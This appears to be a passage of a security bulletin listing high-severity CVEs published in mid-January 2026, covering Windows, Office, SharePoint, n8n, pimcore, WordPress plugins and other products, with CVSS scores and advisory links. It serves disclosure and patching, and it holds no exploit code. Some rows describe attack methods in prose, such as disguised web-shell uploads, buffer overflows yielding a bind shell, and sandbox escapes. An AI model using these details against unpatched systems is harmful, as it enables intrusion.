| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Improper neutralization of special elements used in an sql command ('sql injection') in Microsoft Office SharePoint allows an authorized attacker to execute code over a network. | 2026-01-13 | 8.8 | CVE-2026-20947 | Microsoft SharePoint Server Remote Code Execution Vulnerability |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Deserialization of untrusted data in Microsoft Office SharePoint allows an authorized attacker to execute code over a network. | 2026-01-13 | 8.8 | CVE-2026-20963 | Microsoft SharePoint Remote Code Execution Vulnerability |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Untrusted pointer dereference in Microsoft Office Word allows an unauthorized attacker to execute code locally. | 2026-01-13 | 7.8 | CVE-2026-20948 | Microsoft Word Remote Code Execution Vulnerability |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Improper input validation in Microsoft Office SharePoint allows an unauthorized attacker to execute code locally. | 2026-01-13 | 7.8 | CVE-2026-20951 | Microsoft SharePoint Server Remote Code Execution Vulnerability |
| Microsoft--Microsoft SharePoint Server 2019 | Untrusted search path in Microsoft Office allows an unauthorized attacker to execute code locally. | 2026-01-13 | 7 | CVE-2026-20943 | Microsoft Office Click-To-Run Elevation of Privilege Vulnerability |
| Microsoft--Microsoft SQL Server 2022 (GDR) | Missing authentication for critical function in SQL Server allows an authorized attacker to elevate privileges over a network. | 2026-01-13 | 7.2 | CVE-2026-20803 | Microsoft SQL Server Elevation of Privilege Vulnerability |
| Microsoft--Office Online Server | Use after free in Microsoft Office Excel allows an unauthorized attacker to execute code locally. | 2026-01-13 | 7.8 | CVE-2026-20950 | Microsoft Excel Remote Code Execution Vulnerability |
| Microsoft--Office Online Server | Untrusted pointer dereference in Microsoft Office Excel allows an unauthorized attacker to execute code locally. | 2026-01-13 | 7.8 | CVE-2026-20955 | Microsoft Excel Remote Code Execution Vulnerability |
| Microsoft--Office Online Server | Integer underflow (wrap or wraparound) in Microsoft Office Excel allows an unauthorized attacker to execute code locally. | 2026-01-13 | 7.8 | CVE-2026-20957 | Microsoft Excel Remote Code Execution Vulnerability |
| Microsoft--Windows 10 Version 1809 | Improper input validation in Windows Server Update Service allows an unauthorized attacker to execute code over a network. | 2026-01-13 | 8.1 | CVE-2026-20856 | Windows Server Update Service (WSUS) Remote Code Execution Vulnerability |
| Microsoft--Windows 10 Version 1809 | Heap-based buffer overflow in Windows Routing and Remote Access Service (RRAS) allows an unauthorized attacker to execute code over a network. | 2026-01-13 | 8.8 | CVE-2026-20868 | Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability |
| Microsoft--Windows 10 Version 1809 | External control of file name or path in Windows Telephony Service allows an authorized attacker to elevate privileges over an adjacent network. | 2026-01-13 | 8 | CVE-2026-20931 | Windows Telephony Service Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Incorrect privilege assignment in Windows Hello allows an unauthorized attacker to perform tampering locally. | 2026-01-13 | 7.7 | CVE-2026-20804 | Windows Hello Tampering Vulnerability |
| Microsoft--Windows 10 Version 1809 | Time-of-check time-of-use (toctou) race condition in Windows Kernel Memory allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20809 | Windows Kernel Memory Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Free of memory not on the heap in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20810 | Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Concurrent execution using shared resource with improper synchronization ('race condition') in Graphics Kernel allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7 | CVE-2026-20814 | DirectX Graphics Kernel Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Time-of-check time-of-use (toctou) race condition in Windows Installer allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20816 | Windows Installer Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Use after free in Microsoft Graphics Component allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20822 | Windows Graphics Component Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Concurrent execution using shared resource with improper synchronization ('race condition') in Tablet Windows User Interface (TWINUI) Subsystem allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20826 | Tablet Windows User Interface (TWINUI) Subsystem Information Disclosure Vulnerability |
| Microsoft--Windows 10 Version 1809 | Time-of-check time-of-use (toctou) race condition in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20831 | Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Windows Remote Procedure Call Interface Definition Language (IDL) Elevation of Privilege Vulnerability | 2026-01-13 | 7.8 | CVE-2026-20832 | Windows Remote Procedure Call Interface Definition Language (IDL) Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Concurrent execution using shared resource with improper synchronization ('race condition') in Graphics Kernel allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7 | CVE-2026-20836 | DirectX Graphics Kernel Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Heap-based buffer overflow in Windows Media allows an unauthorized attacker to execute code locally. | 2026-01-13 | 7.8 | CVE-2026-20837 | Windows Media Remote Code Execution Vulnerability |
| Microsoft--Windows 10 Version 1809 | Heap-based buffer overflow in Windows NTFS allows an authorized attacker to execute code locally. | 2026-01-13 | 7.8 | CVE-2026-20840 | Windows NTFS Remote Code Execution Vulnerability |
| Microsoft--Windows 10 Version 1809 | Improper access control in Windows Routing and Remote Access Service (RRAS) allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20843 | Windows Routing and Remote Access Service (RRAS) Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Use after free in Windows Clipboard Server allows an unauthorized attacker to elevate privileges locally. | 2026-01-13 | 7.4 | CVE-2026-20844 | Windows Clipboard Server Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Concurrent execution using shared resource with improper synchronization ('race condition') in Windows SMB Server allows an authorized attacker to elevate privileges over a network. | 2026-01-13 | 7.5 | CVE-2026-20848 | Windows SMB Server Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Reliance on untrusted inputs in a security decision in Windows Kerberos allows an authorized attacker to elevate privileges over a network. | 2026-01-13 | 7.5 | CVE-2026-20849 | Windows Kerberos Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Incorrect privilege assignment in Windows Hello allows an unauthorized attacker to perform tampering locally. | 2026-01-13 | 7.7 | CVE-2026-20852 | Windows Hello Tampering Vulnerability |
| Microsoft--Windows 10 Version 1809 | Concurrent execution using shared resource with improper synchronization ('race condition') in Windows WalletService allows an unauthorized attacker to elevate privileges locally. | 2026-01-13 | 7.4 | CVE-2026-20853 | Windows WalletService Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Use after free in Windows Management Services allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20858 | Windows Management Services Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Access of resource using incompatible type ('type confusion') in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20860 | Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Management Services allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20861 | Windows Management Services Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Heap-based buffer overflow in Connected Devices Platform Service (Cdpsvc) allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20864 | Windows Connected Devices Platform Service Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Use after free in Windows Management Services allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20865 | Windows Management Services Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Management Services allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20866 | Windows Management Services Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Management Services allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20867 | Windows Management Services Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Local Session Manager (LSM) allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7 | CVE-2026-20869 | Windows Local Session Manager (LSM) Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Management Services allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20873 | Windows Management Services Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Management Services allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20874 | Windows Management Services Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Null pointer dereference in Windows Local Security Authority Subsystem Service (LSASS) allows an unauthorized attacker to deny service over a network. | 2026-01-13 | 7.5 | CVE-2026-20875 | Windows Local Security Authority Subsystem Service (LSASS) Denial of Service Vulnerability |
| Microsoft--Windows 10 Version 1809 | Use after free in Windows Management Services allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20877 | Windows Management Services Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Management Services allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20918 | Windows Management Services Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Concurrent execution using shared resource with improper synchronization ('race condition') in Windows SMB Server allows an authorized attacker to elevate privileges over a network. | 2026-01-13 | 7.5 | CVE-2026-20919 | Windows SMB Server Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Concurrent execution using shared resource with improper synchronization ('race condition') in Windows SMB Server allows an authorized attacker to elevate privileges over a network. | 2026-01-13 | 7.5 | CVE-2026-20921 | Windows SMB Server Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Use after free in Windows Management Services allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20923 | Windows Management Services Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Use after free in Windows Management Services allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20924 | Windows Management Services Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Concurrent execution using shared resource with improper synchronization ('race condition') in Windows SMB Server allows an authorized attacker to elevate privileges over a network. | 2026-01-13 | 7.5 | CVE-2026-20926 | Windows SMB Server Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Improper access control in Windows HTTP.sys allows an authorized attacker to elevate privileges over a network. | 2026-01-13 | 7.5 | CVE-2026-20929 | Windows HTTP.sys Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Concurrent execution using shared resource with improper synchronization ('race condition') in Windows SMB Server allows an authorized attacker to elevate privileges over a network. | 2026-01-13 | 7.5 | CVE-2026-20934 | Windows SMB Server Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 22H2 | Heap-based buffer overflow in Windows Cloud Files Mini Filter Driver allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20940 | Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability |
| Microsoft--Windows 11 Version 25H2 | Untrusted pointer dereference in Windows Cloud Files Mini Filter Driver allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20857 | Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability |
| Microsoft--Windows 11 Version 25H2 | Untrusted pointer dereference in Windows Virtualization-Based Security (VBS) Enclave allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20938 | Windows Virtualization-Based Security (VBS) Enclave Elevation of Privilege Vulnerability |
| Microsoft--Windows Admin Center in Azure Portal | Improper verification of cryptographic signature in Windows Admin Center allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.5 | CVE-2026-20965 | Windows Admin Center Elevation of Privilege Vulnerability |
| Microsoft--Windows SDK | Use after free in Inbox COM Objects allows an unauthorized attacker to execute code locally. | 2026-01-13 | 7 | CVE-2026-21219 | Inbox COM Objects (Global Memory) Remote Code Execution Vulnerability |
| Microsoft--Windows Server 2019 | Improper access control in Windows Deployment Services allows an unauthorized attacker to execute code over an adjacent network. | 2026-01-13 | 7.5 | CVE-2026-0386 | Windows Deployment Services Remote Code Execution Vulnerability |
| Microsoft--Windows Server 2022 | Access of resource using incompatible type ('type confusion') in Windows Win32K - ICOMP allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20811 | Win32k Elevation of Privilege Vulnerability |
| Microsoft--Windows Server 2022 | Improper handling of insufficient permissions or privileges in Windows Error Reporting allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20817 | Windows Error Reporting Service Elevation of Privilege Vulnerability |
| Microsoft--Windows Server 2022 | Heap-based buffer overflow in Windows Common Log File System Driver allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20820 | Windows Common Log File System Driver Elevation of Privilege Vulnerability |
| Microsoft--Windows Server 2022 | Use after free in Windows DWM allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7 | CVE-2026-20842 | Microsoft DWM Core Library Elevation of Privilege Vulnerability |
| Microsoft--Windows Server 2022 | Double free in Windows Win32K - ICOMP allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7 | CVE-2026-20863 | Win32k Elevation of Privilege Vulnerability |
| Microsoft--Windows Server 2022 | Use after free in Desktop Windows Manager allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20871 | Desktop Windows Manager Elevation of Privilege Vulnerability |
| Microsoft--Windows Server 2022 | Use after free in Windows Win32K - ICOMP allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20920 | Win32k Elevation of Privilege Vulnerability |
| Microsoft--Windows Server 2022 | Heap-based buffer overflow in Windows NTFS allows an authorized attacker to execute code locally. | 2026-01-13 | 7.8 | CVE-2026-20922 | Windows NTFS Remote Code Execution Vulnerability |
| Microsoft--Windows Server 2025 (Server Core installation) | Concurrent execution using shared resource with improper synchronization ('race condition') in Printer Association Object allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7 | CVE-2026-20808 | Windows File Explorer Elevation of Privilege Vulnerability |
| Microsoft--Windows Server 2025 (Server Core installation) | Concurrent execution using shared resource with improper synchronization ('race condition') in Capability Access Management Service (camsvc) allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7 | CVE-2026-20815 | Capability Access Management Service (camsvc) Elevation of Privilege Vulnerability |
| Microsoft--Windows Server 2025 (Server Core installation) | Concurrent execution using shared resource with improper synchronization ('race condition') in Capability Access Management Service (camsvc) allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7 | CVE-2026-20830 | Capability Access Management Service (camsvc) Elevation of Privilege Vulnerability |
| Microsoft--Windows Server 2025 (Server Core installation) | Use after free in Windows Local Security Authority Subsystem Service (LSASS) allows an authorized attacker to execute code over a network. | 2026-01-13 | 7.5 | CVE-2026-20854 | Windows Local Security Authority Subsystem Service (LSASS) Remote Code Execution Vulnerability |
| Microsoft--Windows Server 2025 (Server Core installation) | Use after free in Windows Kernel-Mode Drivers allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20859 | Windows Kernel-Mode Driver Elevation of Privilege Vulnerability |
| Microsoft--Windows Server 2025 (Server Core installation) | Use after free in Windows Win32K - ICOMP allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20870 | Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability |
| Microsoft--Windows Server 2025 (Server Core installation) | Improper link resolution before file access ('link following') in Host Process for Windows Tasks allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20941 | Host Process for Windows Tasks Elevation of Privilege Vulnerability |
| Microsoft--Windows Server 2025 (Server Core installation) | Concurrent execution using shared resource with improper synchronization ('race condition') in Capability Access Management Service (camsvc) allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7 | CVE-2026-21221 | Capability Access Management Service (camsvc) Elevation of Privilege Vulnerability |
| Millegpg--MilleGPG5 | MilleGPG5 5.7.2 contains a local privilege escalation vulnerability that allows authenticated users to modify service executable files in the MariaDB bin directory. Attackers can replace the mysqld.exe with a malicious executable, which will execute with system privileges when the computer restarts. | 2026-01-15 | 7.8 | CVE-2021-47761 | ExploitDB-50558 Vendor Homepage |
| mindsdb--mindsdb | MindsDB is a platform for building artificial intelligence from enterprise data. Prior to version 25.11.1, an unauthenticated path traversal in the file upload API lets any caller read arbitrary files from the server filesystem and move them into MindsDB's storage, exposing sensitive data. The PUT handler in file.py directly joins user-controlled data into a filesystem path when the request body is JSON and source_type is not "url". Only multipart uploads and URL-sourced uploads receive sanitization; JSON uploads lack any call to clear_filename or equivalent checks. This vulnerability is fixed in 25.11.1. | 2026-01-12 | 8.1 | CVE-2025-68472 | https://github.com/mindsdb/mindsdb/security/advisories/GHSA-qqhf-pm3j-96g7 |
| MIT--Kerberos 5 | In MIT Kerberos 5 (aka krb5) before 1.22 (with incremental propagation), there is an integer overflow for a large update size to resize() in kdb_log.c. An authenticated attacker can cause an out-of-bounds write and kadmind daemon crash. | 2026-01-16 | 7.1 | CVE-2025-24528 | https://github.com/krb5/krb5/commit/78ceba024b64d49612375be4a12d1c066b0bfbd0 https://github.com/krb5/krb5/compare/krb5-1.21.3-final...krb5-1.22-final |
| Modular DS--Modular DS | Incorrect Privilege Assignment vulnerability in Modular DS allows Privilege Escalation. This issue affects Modular DS: from n/a through 2.5.1. | 2026-01-14 | 10 | CVE-2026-23550 | https://patchstack.com/database/wordpress/plugin/modular-connector/vulnerability/wordpress-modular-ds-monitor-update-and-backup-multiple-websites-plugin-2-5-1-privilege-escalation-vulnerability?_s_id=cve https://patchstack.com/articles/critical-privilege-escalation-vulnerability-in-modular-ds-plugin-affecting-40k-sites-exploited-in-the-wild/ https://help.modulards.com/en/article/modular-ds-security-release-modular-connector-252-dm3mv0/ |
| Moeditor--Moeditor | Moeditor 0.2.0 contains a persistent cross-site scripting vulnerability that allows attackers to store malicious payloads within markdown files. Attackers can upload specially crafted markdown files with embedded JavaScript that execute when opened, potentially enabling remote code execution on the victim's system. | 2026-01-16 | 7.2 | CVE-2021-47840 | ExploitDB-49830 Moeditor Official Homepage Proof of Concept Video VulnCheck Advisory: Moeditor 0.2.0 - Persistent Cross-Site Scripting |
| Mp3-Avi-Mpeg-Wmv-Rm-To-Audio-Cd-Burner--Ether_MP3_CD_Burner | Ether MP3 CD Burner 1.3.8 contains a buffer overflow vulnerability in the registration name field that allows remote code execution. Attackers can craft a malicious payload to overwrite SEH handlers and execute a bind shell on port 3110 by exploiting improper input validation. | 2026-01-15 | 9.8 | CVE-2021-47785 | ExploitDB-50332 Software Download Link VulnCheck Advisory: Ether_MP3_CD_Burner 1.3.8 - Buffer Overflow (SEH) |
| mrvladus--Errands | Errands before 46.2.10 does not verify TLS certificates for CalDAV servers. | 2026-01-12 | 8.2 | CVE-2025-71063 | https://github.com/mrvladus/Errands/issues/401 https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1123738 https://github.com/mrvladus/Errands/releases/tag/46.2.10 https://github.com/mrvladus/Errands/commit/04e567b432083fc798ea2249363ea6c83ff01099 https://github.com/mrvladus/Errands/compare/46.2.9...46.2.10 |
| n/a--EasyCMS | A vulnerability was identified in EasyCMS up to 1.6. It affects an unspecified function in the file /UserAction.class.php, where manipulation of the argument _order leads to SQL injection. The attack can be executed remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-17 | 7.3 | CVE-2026-1105 | VDB-341697 (EasyCMS UserAction.class.php SQL injection); CTI Indicators (IOB, IOC, TTP, IOA); Submit #731465; https://github.com/TeamEasy/EasyCMS; EasyCMS v1.6 SQL injection vulnerability https://github.com/ueh1013/VULN/issues/15 |
| N/A--Modular DS | Incorrect Privilege Assignment vulnerability in Modular DS modular-connector allows Privilege Escalation. This issue affects Modular DS: from 2.5.2 before 2.6.0. | 2026-01-16 | 10 | CVE-2026-23800 | https://patchstack.com/database/wordpress/plugin/modular-connector/vulnerability/wordpress-modular-ds-plugin-2-5-2-privilege-escalation-vulnerability?_s_id=cve |
| n8n--n8n | Using string formatting and exception handling, an attacker may bypass n8n's python-task-executor sandbox restrictions and run arbitrary unrestricted Python code on the underlying operating system. The vulnerability can be exploited via the Code block by an authenticated user with basic permissions and can lead to a full n8n instance takeover on instances operating under "Internal" execution mode. If the instance is operating under the "External" execution mode (e.g., n8n's official Docker image), arbitrary code execution occurs inside a sidecar container and not the main node, which significantly reduces the impact of the vulnerability. | 2026-01-18 | 8.5 | CVE-2026-0863 | https://research.jfrog.com/vulnerabilities/n8n-python-runner-sandbox-escape-jfsa-2026-001651077/ https://github.com/n8n-io/n8n/commit/b73a4283cb14e0f27ce19692326f362c7bf3da02 |
| National Oceanic and Atmospheric Administration (NOAA)--Live Access Server (LAS) | Sites running NOAA PMEL Live Access Server (LAS) are vulnerable to remote code execution via specially crafted requests that include PyFerret expressions. By leveraging a SPAWN command, a remote, unauthenticated attacker can execute arbitrary OS commands. Fixed in a version of 'gov.noaa.pmel.tmap.las.filter.RequestInputFilter.java' from 2025-09-24. | 2026-01-15 | 9.8 | CVE-2025-62193 | |
| Noteburner--NoteBurner | NoteBurner 2.35 contains a buffer overflow vulnerability in the license code input field that allows attackers to crash the application. Attackers can generate a 6000-byte payload and paste it into the 'Name' and 'Code' fields to trigger an application crash. | 2026-01-15 | 9.8 | CVE-2021-47798 | ExploitDB-50154 Official Product Homepage VulnCheck Advisory: NoteBurner 2.35 - Denial Of Service (DoS) (PoC) |
| Nsauditor--Backup Key Recovery | Backup Key Recovery 2.2.7 contains a denial of service vulnerability that allows attackers to crash the application by overflowing the registration code input field. Attackers can paste a large buffer of 256 repeated characters into the registration key field to trigger application instability and potential crash. | 2026-01-15 | 7.5 | CVE-2021-47813 | ExploitDB-49966 Vendor Homepage VulnCheck Advisory: Backup Key Recovery 2.2.7 - Denial of Service (PoC) |
| Nsauditor--NBMonitor | NBMonitor 1.6.8 contains a denial of service vulnerability that allows attackers to crash the application by overflowing the registration code input field. Attackers can paste a 256-character buffer into the registration key field to trigger an application crash and potential system instability. | 2026-01-15 | 7.5 | CVE-2021-47814 | ExploitDB-49964 Vendor Homepage VulnCheck Advisory: NBMonitor 1.6.8 - Denial of Service (PoC) |
| Nsauditor--Nsauditor | Nsauditor 3.2.3 contains a denial of service vulnerability in the registration code input field that allows attackers to crash the application. Attackers can paste a large buffer of 256 repeated characters into the 'Key' field to trigger an application crash. | 2026-01-15 | 7.5 | CVE-2021-47815 | ExploitDB-49965 Vendor Homepage VulnCheck Advisory: Nsauditor 3.2.3 - Denial of Service (PoC) |
| NVIDIA--NSIGHT Graphics | NVIDIA NSIGHT Graphics for Linux contains a vulnerability where an attacker could cause command injection. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, data tampering, and denial of service. | 2026-01-14 | 7.8 | CVE-2025-33206 | https://nvd.nist.gov/vuln/detail/CVE-2025-33206 https://www.cve.org/CVERecord?id=CVE-2025-33206 https://nvidia.custhelp.com/app/answers/detail/a_id/5738 |
| Odinesolutions--Odine Solutions GateKeeper | Odine Solutions GateKeeper 1.0 contains a SQL injection vulnerability in the trafficCycle API endpoint that allows remote attackers to inject malicious database queries. Attackers can exploit the vulnerability by sending crafted payloads to the /rass/api/v1/trafficCycle/ endpoint to manipulate PostgreSQL database queries and potentially extract sensitive information. | 2026-01-15 | 8.2 | CVE-2021-47782 | ExploitDB-50381 Odine Solutions GateKeeper Product Homepage VulnCheck Advisory: Odine Solutions GateKeeper 1.0 - 'trafficCycle' SQL Injection |
| OpenAgentPlatform--Dive | Dive is an open-source MCP Host Desktop Application that enables integration with function-calling LLMs. Prior to 0.13.0, crafted deeplink can install an attacker-controlled MCP server configuration without sufficient user confirmation and can lead to arbitrary local command execution on the victim's machine. This vulnerability is fixed in 0.13.0. | 2026-01-16 | 9.7 | CVE-2026-23523 | https://github.com/OpenAgentPlatform/Dive/security/advisories/GHSA-pjj5-f3wm-f9m8 https://github.com/OpenAgentPlatform/Dive/commit/a5162ac9eff366d8ea1215b8a47139a81a55a779 |
| OpenC3--cosmos | OpenC3 COSMOS provides the functionality needed to send commands to and receive data from one or more embedded systems. From 5.0.0 to 6.10.1, OpenC3 COSMOS contains a critical remote code execution vulnerability reachable through the JSON-RPC API. When a JSON-RPC request uses the string form of certain APIs, attacker-controlled parameter text is parsed into values using String#convert_to_value. For array-like inputs, convert_to_value executes eval(). Because the cmd code path parses the command string before calling authorize(), an unauthenticated attacker can trigger Ruby code execution even though the request ultimately fails authorization (401). This vulnerability is fixed in 6.10.2. | 2026-01-13 | 10 | CVE-2025-68271 | https://github.com/OpenC3/cosmos/security/advisories/GHSA-w757-4qv9-mghp |
| Phoenix Contact--TC ROUTER 3002T-3G | An unauthenticated remote attacker can trick a high privileged user into uploading a malicious payload via the config-upload endpoint, leading to code injection as root. This results in a total loss of confidentiality, availability and integrity due to improper control of code generation ('Code Injection'). | 2026-01-13 | 8.8 | CVE-2025-41717 | https://certvde.com/de/advisories/VDE-2025-073 |
| Phphtmledit--CuteEditor | CuteEditor for PHP (now referred to as Rich Text Editor) 6.6 contains a directory traversal vulnerability in the browse template feature that allows attackers to write files to arbitrary web root directories. Attackers can exploit the ServerMapPath() function by renaming uploaded HTML files using directory traversal sequences to write files outside the intended template directory. | 2026-01-13 | 7.5 | CVE-2021-47751 | ExploitDB-50994 Vendor Homepage VulnCheck Advisory: CuteEditor for PHP 6.6 - Directory Traversal |
| Phpkf--phpKF CMS | phpKF CMS 3.00 Beta y6 contains an unauthenticated file upload vulnerability that allows remote attackers to execute arbitrary code by bypassing file extension checks. Attackers can upload a PHP file disguised as a PNG, rename it, and execute system commands through a crafted web shell parameter. | 2026-01-15 | 9.8 | CVE-2021-47753 | ExploitDB-50610 Official Vendor Homepage Software Download Page |
| pimcore--pimcore | Pimcore is an Open Source Data & Experience Management Platform. Prior to 12.3.1 and 11.5.14, an incomplete SQL injection patch in the Admin Search Find API allows an authenticated attacker to perform blind SQL injection. Although CVE-2023-30848 attempted to mitigate SQL injection by removing SQL comments (--) and catching syntax errors, the fix is insufficient. Attackers can still inject SQL payloads that do not rely on comments and infer database information via blind techniques. This vulnerability affects the admin interface and can lead to database information disclosure. This vulnerability is fixed in 12.3.1 and 11.5.14. | 2026-01-14 | 8.8 | CVE-2026-23492 | https://github.com/pimcore/pimcore/security/advisories/GHSA-qvr7-7g55-69xj https://github.com/pimcore/pimcore/commit/25ad8674886f2b938243cbe13e33e204a2e35cc3 |
| pimcore--pimcore | Pimcore is an Open Source Data & Experience Management Platform. Prior to 12.3.1 and 11.5.14, the http_error_log file stores the $_COOKIE and $_SERVER variables, which means sensitive information such as database passwords, cookie session data, and other details can be accessed or recovered through the Pimcore backend. This vulnerability is fixed in 12.3.1 and 11.5.14. | 2026-01-15 | 8.6 | CVE-2026-23493 | https://github.com/pimcore/pimcore/security/advisories/GHSA-q433-j342-rp9h https://github.com/pimcore/pimcore/pull/18918 https://github.com/pimcore/pimcore/commit/002ec7d5f84973819236796e5b314703b58e8601 https://github.com/pimcore/pimcore/releases/tag/v11.5.14 https://github.com/pimcore/pimcore/releases/tag/v12.3.1 |
| Pjo2--Tftpd32_SE | Tftpd32 SE 4.60 contains an unquoted service path vulnerability that allows local attackers to potentially execute arbitrary code with elevated privileges. Attackers can exploit the unquoted path in the service configuration to inject malicious executables that will be run with system-level permissions. | 2026-01-13 | 8.4 | CVE-2023-54338 | ExploitDB-51076 Vendor Homepage VulnCheck Advisory: Tftpd32_SE 4.60 - 'Tftpd32_svc' Unquoted Service Path |
| plugins360--All-in-One Video Gallery | The All-in-One Video Gallery plugin for WordPress is vulnerable to arbitrary file upload in all versions up to, and including, 4.5.7. This is due to insufficient file type validation when detecting VTT files, which allows double-extension files to bypass sanitization while still being accepted as valid VTT files. This makes it possible for authenticated attackers, with author-level access and above, to upload arbitrary files to the affected site's server, which may make remote code execution possible. | 2026-01-16 | 8.8 | CVE-2025-12957 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ad2e1d91-03bd-4e47-b679-81c42414238b?source=cve https://plugins.trac.wordpress.org/changeset/3405593/all-in-one-video-gallery |
